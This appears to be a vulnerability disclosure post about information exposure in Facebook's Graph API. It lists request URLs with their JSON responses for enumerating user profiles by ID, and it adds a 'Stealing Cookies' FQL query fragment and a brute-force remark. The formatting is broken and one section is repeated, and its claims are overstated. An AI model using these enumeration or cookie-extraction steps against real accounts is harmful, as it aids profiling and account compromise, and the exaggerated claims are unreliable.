Facebook Graph API Users ID (and others) Information Disclosure
#
Exploit Title : Facebook
Graph
API Users
ID (and others) Information Disclosure- OAuthException-
# *Vendor*: Facebook.com http://graph.facebook.com
# Author: Juan Carlos Garcia (@secnight)
# Blog: http://hackingmadrid.blogspot.com
BREIF DESCRIPTIONThe Graph API is the primary way that data is retrieved or posted to Facebook. The Getting Started Guide contains an overview of the basics of the API, walks you through using the Graph API Explorer, shows you how names work, how permissions work, what connections are and puts it all together so the rest of this reference make sense.
Disclosure
Anyone
can access the data from ANY user due to the release of information
that produces the "Graph API" because of the functionality
they have given to this API for developers.
The
"excess" functionality provided in this API make data users
are exposed without any need for it any malicious attacker and make a
compilation of information from the target
It
is possible to identify people according to their id as will be seen
in the proof of concept and insecure http protocol also makes it
vulnerable to a brute force attack
Proof
Of Concept ( PoC)
First
…
As
you can see, we have a “"GraphMethodException”
"error":
{
"message":
"Unsupported get request",
"type":
"GraphMethodException",
"code":
100
Creating
an OAuthException
http://graph.facebook.com/00000000000000000000000000000000000000000000
{
"error":
{
"message":
"(#803) Some of the aliases you requested do not exist:
00000000000000000000000000000000000",
"type":
"OAuthException",
"code":
803
Mark
Zuckerberg
CEO Facebook
{
"id":
"4",--curious
… The number 4 .. Who is id 1,2,3 ;)
"name":
"Mark Zuckerberg",
"first_name":
"Mark",
"last_name":
"Zuckerberg",
"link":
"https://www.facebook.com/zuck",
"username":
"zuck",
"gender":
"male",
"locale":
"en_US"
The
Reverse
http://graph.facebook.com/4
Metadata Disclosure
This web .. WTF???
https://graph.facebook.com/172393869485449?metadata=1
https://graph.facebook.com/?ids=http://hackingmadrid.blogspot.com
but...
https://graph.facebook.com/172393869485449?metadata=2
OK, OK ;)
https://graph.facebook.com/172393869485449?metadata=0
IDS=google
https://graph.facebook.com/?ids=google
TWITTER SHARES ? ..
https://graph.facebook.com/?ids=https://www.twitter.com/
Metadata Disclosure
This web .. WTF???
https://graph.facebook.com/172393869485449?metadata=1
https://graph.facebook.com/?ids=http://hackingmadrid.blogspot.com
but...
https://graph.facebook.com/172393869485449?metadata=2
{ "error": { "message": "(#100) Param metadata must be a boolean", "type": "OAuthException", "code": 100
OK, OK ;)
https://graph.facebook.com/172393869485449?metadata=0
IDS=google
https://graph.facebook.com/?ids=google
TWITTER SHARES ? ..
{
"https://www.twitter.com/": {
"id": "https://www.twitter.com/",
"shares": 1386667
}
}
https://graph.facebook.com/?ids=https://www.twitter.com/
COOKIES
Columns
Name |
expires
timestamp |
name
string |
path
string |
uid
numeric
string |
value
string |
To
access this table you only need:
- a valid access token with basic permissions. Facebook Login makes it easy to connect with users on your app or website. You can use several methods in the JavaScript or mobile SDKs to speed up the registration process and build a functional system in minutes.
Stealing
Cookies
You
only need the next SQL Query to extract the cookie...
SELECT
... FROM cookies WHERE uid = A
Note: Additional
filters on other columns can be specified but they may make the query
less efficient.
Permissions
To
access this table you ONLY need:
- a valid access token with basic permissions.
/Admin
"id":
"100005597474065",
"name":
"AD Min",
"first_name":
"AD",
"last_name":
"Min",
"link":
"https://www.facebook.com/ad.min", https://www.facebook.com/ad.min
"username":
"ad.min",
"gender":
"male",
"locale":
"ru_RU"
}
Procedure:Open
de links given above and you can play .. No hack, No fun ;)
Brute Force ?
Brute Force ?
IF protocol="http"
THEN protocol.http.vulnerable=Brute.Force.Attack
Easy? I think YES !!!
All such Information Disclosures that are producing by to the API excess functionality for the developers, make the information gathering penetration testing phase are a simple and immediate work in this social network... work easier to malicious users.
All such Information Disclosures that are producing by to the API excess functionality for the developers, make the information gathering penetration testing phase are a simple and immediate work in this social network... work easier to malicious users.